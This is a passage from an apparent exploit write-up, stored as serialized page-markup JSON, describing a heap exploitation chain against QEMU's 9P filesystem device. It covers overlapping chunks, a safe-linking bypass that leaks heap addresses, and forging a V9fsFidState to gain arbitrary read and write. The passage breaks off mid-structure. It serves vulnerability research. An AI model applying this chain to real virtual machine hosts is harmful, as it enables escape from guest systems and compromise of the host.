0x200\n+----------+----------+----------+----------+----------+\n|..........|          |..........|          |..........|\n|..........| .value X |..........| .value Y |..........|\n|..........|          |..........|          |..........|\n+----------+----------+----------+----------+----------+\n",[131759],{"type":26,"tag":130,"props":131760,"children":131761},{"__ignoreMap":7},[131762],{"type":32,"value":131757},{"type":26,"tag":35,"props":131764,"children":131765},{},[131766,131768,131773],{"type":32,"value":131767},"We then once again fill the remaining holes and recover the oversized chunk by simply allocating every size in the possible range (",{"type":26,"tag":130,"props":131769,"children":131771},{"className":131770},[],[131772],{"type":32,"value":130380},{"type":32,"value":4437},{"type":26,"tag":5512,"props":131775,"children":131777},{"code":131776},"                         .value B\n                      +-------------+\n                      |             |\n                      v             v\n+----------+----------+----------+--+-------+----------+\n|          |          |          |//|       |          |\n| .value A | .value X |          |//|       | .value C |\n|          |          |          |//|       |          |\n+----------+----------+----------+--+-------+----------+\n                                 ^          ^\n                                 |          |\n                                 +----------+\n                                   .value Y\n",[131778],{"type":26,"tag":130,"props":131779,"children":131780},{"__ignoreMap":7},[131781],{"type":32,"value":131776},{"type":26,"tag":35,"props":131783,"children":131784},{},[131785,131787,131793],{"type":32,"value":131786},"After reclaiming it, we use that chunk to overwrite the size of the next chunk again, but this time we set it to ",{"type":26,"tag":130,"props":131788,"children":131790},{"className":131789},[],[131791],{"type":32,"value":131792},"0x400",{"type":32,"value":131794}," - this gives us a chunk that fully overlaps the chunk next to it, leaving us in the following final state:",{"type":26,"tag":5512,"props":131796,"children":131798},{"code":131797},"                                    .value Y extended\n                                            |\n                                 +----------+----------+\n                                 |                     |\n                                 v                     v\n+----------+----------+----------+----------+----------+\n|          |          |          |          |          |\n| .value A | .value X | .value B | .value Y | .value C |\n|          |          |          |          |          |\n+----------+----------+----------+----------+----------+\n",[131799],{"type":26,"tag":130,"props":131800,"children":131801},{"__ignoreMap":7},[131802],{"type":32,"value":131797},{"type":26,"tag":118,"props":131804,"children":131806},{"id":131805},"leaking-a-heap-address",[131807],{"type":32,"value":131808},"Leaking a Heap Address",{"type":26,"tag":35,"props":131810,"children":131811},{},[131812],{"type":32,"value":131813},"We begin by leaking a heap address, since that is the simplest target at this stage. More specifically, we want the address of a heap chunk whose contents we control. Once we have that, we gain a region of memory at a known address with controlled contents, which is useful for placing fake objects or reclaiming the same location with other objects and later inspecting them with an arbitrary read primitive.",{"type":26,"tag":35,"props":131815,"children":131816},{},[131817,131819,131825],{"type":32,"value":131818},"To do this, we abuse the forward (",{"type":26,"tag":130,"props":131820,"children":131822},{"className":131821},[],[131823],{"type":32,"value":131824},"fd",{"type":32,"value":131826},") pointers used by tcache freelists. Modern glibc protects these pointers with a mitigation known as safe-linking. Instead of storing the next free chunk pointer directly, glibc encodes it by XORing it with the address of the current chunk, shifted right by 12:",{"type":26,"tag":5512,"props":131828,"children":131830},{"code":131829},"fd = next ^ (curr >> 12)\n",[131831],{"type":26,"tag":130,"props":131832,"children":131833},{"__ignoreMap":7},[131834],{"type":32,"value":131829},{"type":26,"tag":35,"props":131836,"children":131837},{},[131838,131840,131845,131846,131851],{"type":32,"value":131839},"When a tcache bin is empty and a single chunk is inserted into it, ",{"type":26,"tag":130,"props":131841,"children":131843},{"className":131842},[],[131844],{"type":32,"value":60166},{"type":32,"value":8085},{"type":26,"tag":130,"props":131847,"children":131849},{"className":131848},[],[131850],{"type":32,"value":57099},{"type":32,"value":131852}," because there is no following entry. In that case, the encoding becomes:",{"type":26,"tag":5512,"props":131854,"children":131856},{"code":131855},"fd = 0 ^ (curr >> 12)\n",[131857],{"type":26,"tag":130,"props":131858,"children":131859},{"__ignoreMap":7},[131860],{"type":32,"value":131855},{"type":26,"tag":35,"props":131862,"children":131863},{},[131864,131866,131871],{"type":32,"value":131865},"So if we free a single chunk into an empty tcache bin, its ",{"type":26,"tag":130,"props":131867,"children":131869},{"className":131868},[],[131870],{"type":32,"value":131824},{"type":32,"value":131872}," field is effectively just the chunk address shifted right by 12.",{"type":26,"tag":35,"props":131874,"children":131875},{},[131876],{"type":32,"value":131877},"In the overlap we achieved earlier:",{"type":26,"tag":5512,"props":131879,"children":131881},{"code":131880},"             .value Y extended\n                     |\n+--------------------+--------------------+\n|                                         |\n|                                         |\nv                                         v\n+--------------------+--------------------+\n|                    |                    |\n|      .value Y      |      .value C      |\n|                    |                    |\n+--------------------+--------------------+\n",[131882],{"type":26,"tag":130,"props":131883,"children":131884},{"__ignoreMap":7},[131885],{"type":32,"value":131880},{"type":26,"tag":35,"props":131887,"children":131888},{},[131889,131891,131897,131899,131905,131907,131913,131915,131920],{"type":32,"value":131890},"We first free ",{"type":26,"tag":130,"props":131892,"children":131894},{"className":131893},[],[131895],{"type":32,"value":131896},".value C",{"type":32,"value":131898}," into tcache and read its contents through the oversized ",{"type":26,"tag":130,"props":131900,"children":131902},{"className":131901},[],[131903],{"type":32,"value":131904},".value Y",{"type":32,"value":131906},". This gives us ",{"type":26,"tag":130,"props":131908,"children":131910},{"className":131909},[],[131911],{"type":32,"value":131912},".value C >> 12",{"type":32,"value":131914},". That is not yet the exact address of ",{"type":26,"tag":130,"props":131916,"children":131918},{"className":131917},[],[131919],{"type":32,"value":131896},{"type":32,"value":131921},", since the lower 12 bits are lost.",{"type":26,"tag":35,"props":131923,"children":131924},{},[131925,131927,131932,131934,131939,131941,131946,131948,131953],{"type":32,"value":131926},"To recover the exact address of a controlled heap chunk, we reclaim ",{"type":26,"tag":130,"props":131928,"children":131930},{"className":131929},[],[131931],{"type":32,"value":131896},{"type":32,"value":131933},", then free a different controlled chunk into the same tcache bin. After that, we free ",{"type":26,"tag":130,"props":131935,"children":131937},{"className":131936},[],[131938],{"type":32,"value":131896},{"type":32,"value":131940}," again. This time, ",{"type":26,"tag":130,"props":131942,"children":131944},{"className":131943},[],[131945],{"type":32,"value":60166},{"type":32,"value":131947}," is no longer ",{"type":26,"tag":130,"props":131949,"children":131951},{"className":131950},[],[131952],{"type":32,"value":57099},{"type":32,"value":131954},", but instead points to that controlled chunk, so the encoded forward pointer becomes:",{"type":26,"tag":5512,"props":131956,"children":131957},{"code":131829},[131958],{"type":26,"tag":130,"props":131959,"children":131960},{"__ignoreMap":7},[131961],{"type":32,"value":131829},{"type":26,"tag":35,"props":131963,"children":131964},{},[131965,131967,131973,131975,131980,131982,131987,131989,131994],{"type":32,"value":131966},"Since we already know ",{"type":26,"tag":130,"props":131968,"children":131970},{"className":131969},[],[131971],{"type":32,"value":131972},"curr >> 12",{"type":32,"value":131974}," from the first leak, we can read the new ",{"type":26,"tag":130,"props":131976,"children":131978},{"className":131977},[],[131979],{"type":32,"value":131824},{"type":32,"value":131981}," value from ",{"type":26,"tag":130,"props":131983,"children":131985},{"className":131984},[],[131986],{"type":32,"value":131896},{"type":32,"value":131988}," and recover the exact address of ",{"type":26,"tag":130,"props":131990,"children":131992},{"className":131991},[],[131993],{"type":32,"value":60166},{"type":32,"value":131995}," by reversing the XOR:",{"type":26,"tag":5512,"props":131997,"children":131999},{"code":131998},"next = fd ^ (curr >> 12)\n",[132000],{"type":26,"tag":130,"props":132001,"children":132002},{"__ignoreMap":7},[132003],{"type":32,"value":131998},{"type":26,"tag":35,"props":132005,"children":132006},{},[132007],{"type":32,"value":132008},"This gives us the exact address of a heap chunk whose contents we control.",{"type":26,"tag":118,"props":132010,"children":132012},{"id":132011},"arbitrary-read-and-write",[132013],{"type":32,"value":132014},"Arbitrary Read and Write",{"type":26,"tag":35,"props":132016,"children":132017},{},[132018,132020,132025],{"type":32,"value":132019},"Having a controlled chunk at a known address lets us repurpose ",{"type":26,"tag":130,"props":132021,"children":132023},{"className":132022},[],[132024],{"type":32,"value":131896},{"type":32,"value":132026}," into an arbitrary read/write primitive. To do that, we go back to the 9P device.",{"type":26,"tag":35,"props":132028,"children":132029},{},[132030,132032,132037],{"type":32,"value":132031},"Recall ",{"type":26,"tag":130,"props":132033,"children":132035},{"className":132034},[],[132036],{"type":32,"value":130500},{"type":32,"value":7072},{"type":26,"tag":5512,"props":132039,"children":132041},{"code":132040,"language":4326,"meta":7,"className":19107,"style":7},"static void coroutine_fn v9fs_xattrcreate(void *opaque)\n{\n    uint64_t size;\n    V9fsFidState *file_fidp;\n    V9fsFidState *xattr_fidp;\n\n    [...]\n\n    file_fidp = get_fid(pdu, fid);\n\n    [...]\n\n    /* Make the file fid point to xattr */\n    xattr_fidp = file_fidp;\n    xattr_fidp->fs.xattr.len = size;\n    xattr_fidp->fs.xattr.value = g_malloc0(size);\n\n    [...]\n",[132042],{"type":26,"tag":130,"props":132043,"children":132044},{"__ignoreMap":7},[132045,132084,132091,132102,132117,132132,132139,132146,132153,132175,132182,132189,132196,132204,132221,132260,132303,132310],{"type":26,"tag":137,"props":132046,"children":132047},{"class":5559,"line":5560},[132048,132052,132056,132060,132064,132068,132072,132076,132080],{"type":26,"tag":137,"props":132049,"children":132050},{"style":5573},[132051],{"type":32,"value":53647},{"type":26,"tag":137,"props":132053,"children":132054},{"style":5573},[132055],{"type":32,"value":53652},{"type":26,"tag":137,"props":132057,"children":132058},{"style":5601},[132059],{"type":32,"value":130495},{"type":26,"tag":137,"props":132061,"children":132062},{"style":5682},[132063],{"type":32,"value":130500},{"type":26,"tag":137,"props":132065,"children":132066},{"style":5601},[132067],{"type":32,"value":165},{"type":26,"tag":137,"props":132069,"children":132070},{"style":5573},[132071],{"type":32,"value":54230},{"type":26,"tag":137,"props":132073,"children":132074},{"style":5590},[132075],{"type":32,"value":12406},{"type":26,"tag":137,"props":132077,"children":132078},{"style":5584},[132079],{"type":32,"value":130517},{"type":26,"tag":137,"props":132081,"children":132082},{"style":5601},[132083],{"type":32,"value":5742},{"type":26,"tag":137,"props":132085,"children":132086},{"class":5559,"line":5412},[132087],{"type":26,"tag":137,"props":132088,"children":132089},{"style":5601},[132090],{"type":32,"value":13471},{"type":26,"tag":137,"props":132092,"children":132093},{"class":5559,"line":5417},[132094,132098],{"type":26,"tag":137,"props":132095,"children":132096},{"style":5573},[132097],{"type":32,"value":58215},{"type":26,"tag":137,"props":132099,"children":132100},{"style":5601},[132101],{"type":32,"value":127153},{"type":26,"tag":137,"props":132103,"children":132104},{"class":5559,"line":5642},[132105,132109,132113],{"type":26,"tag":137,"props":132106,"children":132107},{"style":5601},[132108],{"type":32,"value":130642},{"type":26,"tag":137,"props":132110,"children":132111},{"style":5590},[132112],{"type":32,"value":7152},{"type":26,"tag":137,"props":132114,"children":132115},{"style":5601},[132116],{"type":32,"value":130651},{"type":26,"tag":137,"props":132118,"children":132119},{"class":5559,"line":5745},[132120,132124,132128],{"type":26,"tag":137,"props":132121,"children":132122},{"style":5601},[132123],{"type":32,"value":130642},{"type":26,"tag":137,"props":132125,"children":132126},{"style":5590},[132127],{"type":32,"value":7152},{"type":26,"tag":137,"props":132129,"children":132130},{"style":5601},[132131],{"type":32,"value":130667},{"type":26,"tag":137,"props":132133,"children":132134},{"class":5559,"line":5850},[132135],{"type":26,"tag":137,"props":132136,"children":132137},{"emptyLinePlaceholder":18},[132138],{"type":32,"value":6276},{"type":26,"tag":137,"props":132140,"children":132141},{"class":5559,"line":5878},[132142],{"type":26,"tag":137,"props":132143,"children":132144},{"style":5601},[132145],{"type":32,"value":107381},{"type":26,"tag":137,"props":132147,"children":132148},{"class":5559,"line":5891},[132149],{"type":26,"tag":137,"props":132150,"children":132151},{"emptyLinePlaceholder":18},[132152],{"type":32,"value":6276},{"type":26,"tag":137,"props":132154,"children":132155},{"class":5559,"line":5909},[132156,132161,132165,132170],{"type":26,"tag":137,"props":132157,"children":132158},{"style":5601},[132159],{"type":32,"value":132160},"    file_fidp ",{"type":26,"tag":137,"props":132162,"children":132163},{"style":5590},[132164],{"type":32,"value":289},{"type":26,"tag":137,"props":132166,"children":132167},{"style":5682},[132168],{"type":32,"value":132169}," get_fid",{"type":26,"tag":137,"props":132171,"children":132172},{"style":5601},[132173],{"type":32,"value":132174},"(pdu, fid);\n",{"type":26,"tag":137,"props":132176,"children":132177},{"class":5559,"line":5930},[132178],{"type":26,"tag":137,"props":132179,"children":132180},{"emptyLinePlaceholder":18},[132181],{"type":32,"value":6276},{"type":26,"tag":137,"props":132183,"children":132184},{"class":5559,"line":5939},[132185],{"type":26,"tag":137,"props":132186,"children":132187},{"style":5601},[132188],{"type":32,"value":107381},{"type":26,"tag":137,"props":132190,"children":132191},{"class":5559,"line":6191},[132192],{"type":26,"tag":137,"props":132193,"children":132194},{"emptyLinePlaceholder":18},[132195],{"type":32,"value":6276},{"type":26,"tag":137,"props":132197,"children":132198},{"class":5559,"line":6208},[132199],{"type":26,"tag":137,"props":132200,"children":132201},{"style":5564},[132202],{"type":32,"value":132203},"    /* Make the file fid point to xattr */\n",{"type":26,"tag":137,"props":132205,"children":132206},{"class":5559,"line":6225},[132207,132212,132216],{"type":26,"tag":137,"props":132208,"children":132209},{"style":5601},[132210],{"type":32,"value":132211},"    xattr_fidp ",{"type":26,"tag":137,"props":132213,"children":132214},{"style":5590},[132215],{"type":32,"value":289},{"type":26,"tag":137,"props":132217,"children":132218},{"style":5601},[132219],{"type":32,"value":132220}," file_fidp;\n",{"type":26,"tag":137,"props":132222,"children":132223},{"class":5559,"line":6238},[132224,132228,132232,132236,132240,132244,132248,132252,132256],{"type":26,"tag":137,"props":132225,"children":132226},{"style":5584},[132227],{"type":32,"value":131045},{"type":26,"tag":137,"props":132229,"children":132230},{"style":5601},[132231],{"type":32,"value":16348},{"type":26,"tag":137,"props":132233,"children":132234},{"style":5584},[132235],{"type":32,"value":39578},{"type":26,"tag":137,"props":132237,"children":132238},{"style":5601},[132239],{"type":32,"value":470},{"type":26,"tag":137,"props":132241,"children":132242},{"style":5584},[132243],{"type":32,"value":130969},{"type":26,"tag":137,"props":132245,"children":132246},{"style":5601},[132247],{"type":32,"value":470},{"type":26,"tag":137,"props":132249,"children":132250},{"style":5584},[132251],{"type":32,"value":11727},{"type":26,"tag":137,"props":132253,"children":132254},{"style":5590},[132255],{"type":32,"value":5593},{"type":26,"tag":137,"props":132257,"children":132258},{"style":5601},[132259],{"type":32,"value":127153},{"type":26,"tag":137,"props":132261,"children":132262},{"class":5559,"line":6247},[132263,132267,132271,132275,132279,132283,132287,132291,132295,132299],{"type":26,"tag":137,"props":132264,"children":132265},{"style":5584},[132266],{"type":32,"value":131045},{"type":26,"tag":137,"props":132268,"children":132269},{"style":5601},[132270],{"type":32,"value":16348},{"type":26,"tag":137,"props":132272,"children":132273},{"style":5584},[132274],{"type":32,"value":39578},{"type":26,"tag":137,"props":132276,"children":132277},{"style":5601},[132278],{"type":32,"value":470},{"type":26,"tag":137,"props":132280,"children":132281},{"style":5584},[132282],{"type":32,"value":130969},{"type":26,"tag":137,"props":132284,"children":132285},{"style":5601},[132286],{"type":32,"value":470},{"type":26,"tag":137,"props":132288,"children":132289},{"style":5584},[132290],{"type":32,"value":41748},{"type":26,"tag":137,"props":132292,"children":132293},{"style":5590},[132294],{"type":32,"value":5593},{"type":26,"tag":137,"props":132296,"children":132297},{"style":5682},[132298],{"type":32,"value":126725},{"type":26,"tag":137,"props":132300,"children":132301},{"style":5601},[132302],{"type":32,"value":131082},{"type":26,"tag":137,"props":132304,"children":132305},{"class":5559,"line":6270},[132306],{"type":26,"tag":137,"props":132307,"children":132308},{"emptyLinePlaceholder":18},[132309],{"type":32,"value":6276},{"type":26,"tag":137,"props":132311,"children":132312},{"class":5559,"line":6279},[132313],{"type":26,"tag":137,"props":132314,"children":132315},{"style":5601},[132316],{"type":32,"value":107381},{"type":26,"tag":35,"props":132318,"children":132319},{},[132320,132322,132328,132330,132335,132336,132341,132343,132348,132350,132356,132357,132363,132365,132370,132371,132376],{"type":32,"value":132321},"The important detail here is that an xattr FID stores both the backing pointer and its length inside the surrounding ",{"type":26,"tag":130,"props":132323,"children":132325},{"className":132324},[],[132326],{"type":32,"value":132327},"V9fsFidState",{"type":32,"value":132329}," object. In other words, if we can place a ",{"type":26,"tag":130,"props":132331,"children":132333},{"className":132332},[],[132334],{"type":32,"value":132327},{"type":32,"value":9906},{"type":26,"tag":130,"props":132337,"children":132339},{"className":132338},[],[132340],{"type":32,"value":131896},{"type":32,"value":132342}," currently sits, the overlapping ",{"type":26,"tag":130,"props":132344,"children":132346},{"className":132345},[],[132347],{"type":32,"value":131904},{"type":32,"value":132349}," chunk can overwrite ",{"type":26,"tag":130,"props":132351,"children":132353},{"className":132352},[],[132354],{"type":32,"value":132355},"V9fsFidState.fs.xattr.value",{"type":32,"value":3339},{"type":26,"tag":130,"props":132358,"children":132360},{"className":132359},[],[132361],{"type":32,"value":132362},"V9fsFidState.fs.xattr.len",{"type":32,"value":132364},". That would immediately give us arbitrary read and write through ",{"type":26,"tag":130,"props":132366,"children":132368},{"className":132367},[],[132369],{"type":32,"value":131158},{"type":32,"value":3339},{"type":26,"tag":130,"props":132372,"children":132374},{"className":132373},[],[132375],{"type":32,"value":131150},{"type":32,"value":470},{"type":26,"tag":35,"props":132378,"children":132379},{},[132380,132382,132387,132388,132393,132395,132400,132402,132408,132410,132415,132417,132422,132424,132429,132431,132436,132438,132443],{"type":32,"value":132381},"At this point, ",{"type":26,"tag":130,"props":132383,"children":132385},{"className":132384},[],[132386],{"type":32,"value":131896},{"type":32,"value":18035},{"type":26,"tag":130,"props":132389,"children":132391},{"className":132390},[],[132392],{"type":32,"value":130365},{"type":32,"value":132394}," chunk, while ",{"type":26,"tag":130,"props":132396,"children":132398},{"className":132397},[],[132399],{"type":32,"value":132327},{"type":32,"value":132401}," falls into the ",{"type":26,"tag":130,"props":132403,"children":132405},{"className":132404},[],[132406],{"type":32,"value":132407},"0x120",{"type":32,"value":132409}," size class. Before freeing ",{"type":26,"tag":130,"props":132411,"children":132413},{"className":132412},[],[132414],{"type":32,"value":131896},{"type":32,"value":132416},", we therefore use the oversized ",{"type":26,"tag":130,"props":132418,"children":132420},{"className":132419},[],[132421],{"type":32,"value":131904},{"type":32,"value":132423}," chunk to change its size to match ",{"type":26,"tag":130,"props":132425,"children":132427},{"className":132426},[],[132428],{"type":32,"value":132327},{"type":32,"value":132430},". Once ",{"type":26,"tag":130,"props":132432,"children":132434},{"className":132433},[],[132435],{"type":32,"value":131896},{"type":32,"value":132437}," is freed, it is inserted into the ",{"type":26,"tag":130,"props":132439,"children":132441},{"className":132440},[],[132442],{"type":32,"value":132407},{"type":32,"value":132444}," tcache bin.",{"type":26,"tag":5512,"props":132446,"children":132448},{"code":132447},"             .value Y extended\n                     |\n+--------------------+--------------------+\n|                                         |\n|                          Free           |\nv                          0x120          v\n+--------------------+---------------+----+\n|                    |...............|    |\n|      .value Y      |...............|    |\n|                    |...............|    |\n+--------------------+---------------+----+\n",[132449],{"type":26,"tag":130,"props":132450,"children":132451},{"__ignoreMap":7},[132452],{"type":32,"value":132447},{"type":26,"tag":35,"props":132454,"children":132455},{},[132456,132458,132463,132465,132471,132473,132479,132481,132486],{"type":32,"value":132457},"After that, we can simply allocate a new ",{"type":26,"tag":130,"props":132459,"children":132461},{"className":132460},[],[132462],{"type":32,"value":132327},{"type":32,"value":132464}," with a ",{"type":26,"tag":130,"props":132466,"children":132468},{"className":132467},[],[132469],{"type":32,"value":132470},"P9_TWALK",{"type":32,"value":132472}," request and a fresh FID - this reaches ",{"type":26,"tag":130,"props":132474,"children":132476},{"className":132475},[],[132477],{"type":32,"value":132478},"alloc_fid",{"type":32,"value":132480},", which allocates a new ",{"type":26,"tag":130,"props":132482,"children":132484},{"className":132483},[],[132485],{"type":32,"value":132327},{"type":32,"value":7072},{"type":26,"tag":5512,"props":132488,"children":132490},{"code":132489,"language":4326,"meta":7,"className":19107,"style":7},"static void coroutine_fn v9fs_walk(void *opaque)\n{\n    V9fsFidState *fidp;\n    V9fsFidState *newfidp = NULL;\n\n    [...]\n\n    if (fid == newfid) {\n        [...]\n    } else {\n        newfidp = alloc_fid(s, newfid);\n        if (newfidp == NULL) {\n            err = -EINVAL;\n            goto out;\n        }\n        newfidp->uid = fidp->uid;\n        v9fs_path_copy(&newfidp->path, &path);\n    }\n\n    [...]\n}\n\nstatic V9fsFidState *alloc_fid(V9fsState *s, int32_t fid)\n{\n    V9fsFidState *f;\n\n    f = g_hash_table_lookup(s->fids, GINT_TO_POINTER(fid));\n    if (f) {\n        /* If fid is already there return NULL */\n        BUG_ON(f->clunked);\n        return NULL;\n    }\n    f = g_new0(V9fsFidState, 1);\n\n    [...]\n",[132491],{"type":26,"tag":130,"props":132492,"children":132493},{"__ignoreMap":7},[132494,132534,132541,132557,132585,132592,132599,132606,132627,132634,132649,132671,132695,132716,132727,132734,132772,132814,132821,132828,132835,132842,132849,132900,132907,132922,132929,132977,132989,132997,133026,133041,133048,133077,133084],{"type":26,"tag":137,"props":132495,"children":132496},{"class":5559,"line":5560},[132497,132501,132505,132509,132514,132518,132522,132526,132530],{"type":26,"tag":137,"props":132498,"children":132499},{"style":5573},[132500],{"type":32,"value":53647},{"type":26,"tag":137,"props":132502,"children":132503},{"style":5573},[132504],{"type":32,"value":53652},{"type":26,"tag":137,"props":132506,"children":132507},{"style":5601},[132508],{"type":32,"value":130495},{"type":26,"tag":137,"props":132510,"children":132511},{"style":5682},[132512],{"type":32,"value":132513},"v9fs_walk",{"type":26,"tag":137,"props":132515,"children":132516},{"style":5601},[132517],{"type":32,"value":165},{"type":26,"tag":137,"props":132519,"children":132520},{"style":5573},[132521],{"type":32,"value":54230},{"type":26,"tag":137,"props":132523,"children":132524},{"style":5590},[132525],{"type":32,"value":12406},{"type":26,"tag":137,"props":132527,"children":132528},{"style":5584},[132529],{"type":32,"value":130517},{"type":26,"tag":137,"props":132531,"children":132532},{"style":5601},[132533],{"type":32,"value":5742},{"type":26,"tag":137,"props":132535,"children":132536},{"class":5559,"line":5412},[132537],{"type":26,"tag":137,"props":132538,"children":132539},{"style":5601},[132540],{"type":32,"value":13471},{"type":26,"tag":137,"props":132542,"children":132543},{"class":5559,"line":5417},[132544,132548,132552],{"type":26,"tag":137,"props":132545,"children":132546},{"style":5601},[132547],{"type":32,"value":130642},{"type":26,"tag":137,"props":132549,"children":132550},{"style":5590},[132551],{"type":32,"value":7152},{"type":26,"tag":137,"props":132553,"children":132554},{"style":5601},[132555],{"type":32,"value":132556},"fidp;\n",{"type":26,"tag":137,"props":132558,"children":132559},{"class":5559,"line":5642},[132560,132564,132568,132573,132577,132581],{"type":26,"tag":137,"props":132561,"children":132562},{"style":5601},[132563],{"type":32,"value":130642},{"type":26,"tag":137,"props":132565,"children":132566},{"style":5590},[132567],{"type":32,"value":7152},{"type":26,"tag":137,"props":132569,"children":132570},{"style":5601},[132571],{"type":32,"value":132572},"newfidp ",{"type":26,"tag":137,"props":132574,"children":132575},{"style":5590},[132576],{"type":32,"value":289},{"type":26,"tag":137,"props":132578,"children":132579},{"style":5573},[132580],{"type":32,"value":130321},{"type":26,"tag":137,"props":132582,"children":132583},{"style":5601},[132584],{"type":32,"value":5604},{"type":26,"tag":137,"props":132586,"children":132587},{"class":5559,"line":5745},[132588],{"type":26,"tag":137,"props":132589,"children":132590},{"emptyLinePlaceholder":18},[132591],{"type":32,"value":6276},{"type":26,"tag":137,"props":132593,"children":132594},{"class":5559,"line":5850},[132595],{"type":26,"tag":137,"props":132596,"children":132597},{"style":5601},[132598],{"type":32,"value":107381},{"type":26,"tag":137,"props":132600,"children":132601},{"class":5559,"line":5878},[132602],{"type":26,"tag":137,"props":132603,"children":132604},{"emptyLinePlaceholder":18},[132605],{"type":32,"value":6276},{"type":26,"tag":137,"props":132607,"children":132608},{"class":5559,"line":5891},[132609,132613,132618,132622],{"type":26,"tag":137,"props":132610,"children":132611},{"style":5610},[132612],{"type":32,"value":14870},{"type":26,"tag":137,"props":132614,"children":132615},{"style":5601},[132616],{"type":32,"value":132617}," (fid ",{"type":26,"tag":137,"props":132619,"children":132620},{"style":5590},[132621],{"type":32,"value":11161},{"type":26,"tag":137,"props":132623,"children":132624},{"style":5601},[132625],{"type":32,"value":132626}," newfid) {\n",{"type":26,"tag":137,"props":132628,"children":132629},{"class":5559,"line":5909},[132630],{"type":26,"tag":137,"props":132631,"children":132632},{"style":5601},[132633],{"type":32,"value":126591},{"type":26,"tag":137,"props":132635,"children":132636},{"class":5559,"line":5930},[132637,132641,132645],{"type":26,"tag":137,"props":132638,"children":132639},{"style":5601},[132640],{"type":32,"value":18371},{"type":26,"tag":137,"props":132642,"children":132643},{"style":5610},[132644],{"type":32,"value":5902},{"type":26,"tag":137,"props":132646,"children":132647},{"style":5601},[132648],{"type":32,"value":5875},{"type":26,"tag":137,"props":132650,"children":132651},{"class":5559,"line":5939},[132652,132657,132661,132666],{"type":26,"tag":137,"props":132653,"children":132654},{"style":5601},[132655],{"type":32,"value":132656},"        newfidp ",{"type":26,"tag":137,"props":132658,"children":132659},{"style":5590},[132660],{"type":32,"value":289},{"type":26,"tag":137,"props":132662,"children":132663},{"style":5682},[132664],{"type":32,"value":132665}," alloc_fid",{"type":26,"tag":137,"props":132667,"children":132668},{"style":5601},[132669],{"type":32,"value":132670},"(s, newfid);\n",{"type":26,"tag":137,"props":132672,"children":132673},{"class":5559,"line":6191},[132674,132678,132683,132687,132691],{"type":26,"tag":137,"props":132675,"children":132676},{"style":5610},[132677],{"type":32,"value":5856},{"type":26,"tag":137,"props":132679,"children":132680},{"style":5601},[132681],{"type":32,"value":132682}," (newfidp ",{"type":26,"tag":137,"props":132684,"children":132685},{"style":5590},[132686],{"type":32,"value":11161},{"type":26,"tag":137,"props":132688,"children":132689},{"style":5573},[132690],{"type":32,"value":130321},{"type":26,"tag":137,"props":132692,"children":132693},{"style":5601},[132694],{"type":32,"value":17395},{"type":26,"tag":137,"props":132696,"children":132697},{"class":5559,"line":6208},[132698,132703,132707,132711],{"type":26,"tag":137,"props":132699,"children":132700},{"style":5601},[132701],{"type":32,"value":132702},"            err ",{"type":26,"tag":137,"props":132704,"children":132705},{"style":5590},[132706],{"type":32,"value":289},{"type":26,"tag":137,"props":132708,"children":132709},{"style":5590},[132710],{"type":32,"value":53858},{"type":26,"tag":137,"props":132712,"children":132713},{"style":5601},[132714],{"type":32,"value":132715},"EINVAL;\n",{"type":26,"tag":137,"props":132717,"children":132718},{"class":5559,"line":6225},[132719,132723],{"type":26,"tag":137,"props":132720,"children":132721},{"style":5610},[132722],{"type":32,"value":63151},{"type":26,"tag":137,"props":132724,"children":132725},{"style":5601},[132726],{"type":32,"value":63156},{"type":26,"tag":137,"props":132728,"children":132729},{"class":5559,"line":6238},[132730],{"type":26,"tag":137,"props":132731,"children":132732},{"style":5601},[132733],{"type":32,"value":5936},{"type":26,"tag":137,"props":132735,"children":132736},{"class":5559,"line":6247},[132737,132742,132746,132751,132755,132760,132764,132768],{"type":26,"tag":137,"props":132738,"children":132739},{"style":5584},[132740],{"type":32,"value":132741},"        newfidp",{"type":26,"tag":137,"props":132743,"children":132744},{"style":5601},[132745],{"type":32,"value":16348},{"type":26,"tag":137,"props":132747,"children":132748},{"style":5584},[132749],{"type":32,"value":132750},"uid",{"type":26,"tag":137,"props":132752,"children":132753},{"style":5590},[132754],{"type":32,"value":5593},{"type":26,"tag":137,"props":132756,"children":132757},{"style":5584},[132758],{"type":32,"value":132759}," fidp",{"type":26,"tag":137,"props":132761,"children":132762},{"style":5601},[132763],{"type":32,"value":16348},{"type":26,"tag":137,"props":132765,"children":132766},{"style":5584},[132767],{"type":32,"value":132750},{"type":26,"tag":137,"props":132769,"children":132770},{"style":5601},[132771],{"type":32,"value":5604},{"type":26,"tag":137,"props":132773,"children":132774},{"class":5559,"line":6270},[132775,132780,132784,132788,132793,132797,132801,132805,132809],{"type":26,"tag":137,"props":132776,"children":132777},{"style":5682},[132778],{"type":32,"value":132779},"        v9fs_path_copy",{"type":26,"tag":137,"props":132781,"children":132782},{"style":5601},[132783],{"type":32,"value":165},{"type":26,"tag":137,"props":132785,"children":132786},{"style":5590},[132787],{"type":32,"value":5694},{"type":26,"tag":137,"props":132789,"children":132790},{"style":5584},[132791],{"type":32,"value":132792},"newfidp",{"type":26,"tag":137,"props":132794,"children":132795},{"style":5601},[132796],{"type":32,"value":16348},{"type":26,"tag":137,"props":132798,"children":132799},{"style":5584},[132800],{"type":32,"value":114895},{"type":26,"tag":137,"props":132802,"children":132803},{"style":5601},[132804],{"type":32,"value":1108},{"type":26,"tag":137,"props":132806,"children":132807},{"style":5590},[132808],{"type":32,"value":5694},{"type":26,"tag":137,"props":132810,"children":132811},{"style":5601},[132812],{"type":32,"value":132813},"path);\n",{"type":26,"tag":137,"props":132815,"children":132816},{"class":5559,"line":6279},[132817],{"type":26,"tag":137,"props":132818,"children":132819},{"style":5601},[132820],{"type":32,"value":5945},{"type":26,"tag":137,"props":132822,"children":132823},{"class":5559,"line":6288},[132824],{"type":26,"tag":137,"props":132825,"children":132826},{"emptyLinePlaceholder":18},[132827],{"type":32,"value":6276},{"type":26,"tag":137,"props":132829,"children":132830},{"class":5559,"line":6355},[132831],{"type":26,"tag":137,"props":132832,"children":132833},{"style":5601},[132834],{"type":32,"value":107381},{"type":26,"tag":137,"props":132836,"children":132837},{"class":5559,"line":6363},[132838],{"type":26,"tag":137,"props":132839,"children":132840},{"style":5601},[132841],{"type":32,"value":6507},{"type":26,"tag":137,"props":132843,"children":132844},{"class":5559,"line":6393},[132845],{"type":26,"tag":137,"props":132846,"children":132847},{"emptyLinePlaceholder":18},[132848],{"type":32,"value":6276},{"type":26,"tag":137,"props":132850,"children":132851},{"class":5559,"line":6401},[132852,132856,132861,132865,132869,132874,132878,132882,132886,132891,132896],{"type":26,"tag":137,"props":132853,"children":132854},{"style":5573},[132855],{"type":32,"value":53647},{"type":26,"tag":137,"props":132857,"children":132858},{"style":5601},[132859],{"type":32,"value":1